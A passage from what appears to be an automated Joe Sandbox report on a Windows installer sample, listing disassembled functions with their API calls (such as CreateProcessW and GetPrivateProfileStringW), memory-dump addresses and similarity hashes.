                                                                    • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                    Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                    • String ID: !N~
                                                                    • API String ID: 623250636-529124213
                                                                    • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                    • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                    • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                    • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                    Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                    • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                    Strings
                                                                    • Error launching installer, xrefs: 00405C48
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                    • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                    • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                    • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                    Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                      • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                    • API String ID: 3509786178-2769509956
                                                                    • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                    • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                    • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                    • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                    Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                    • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                    • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                    • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                    • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4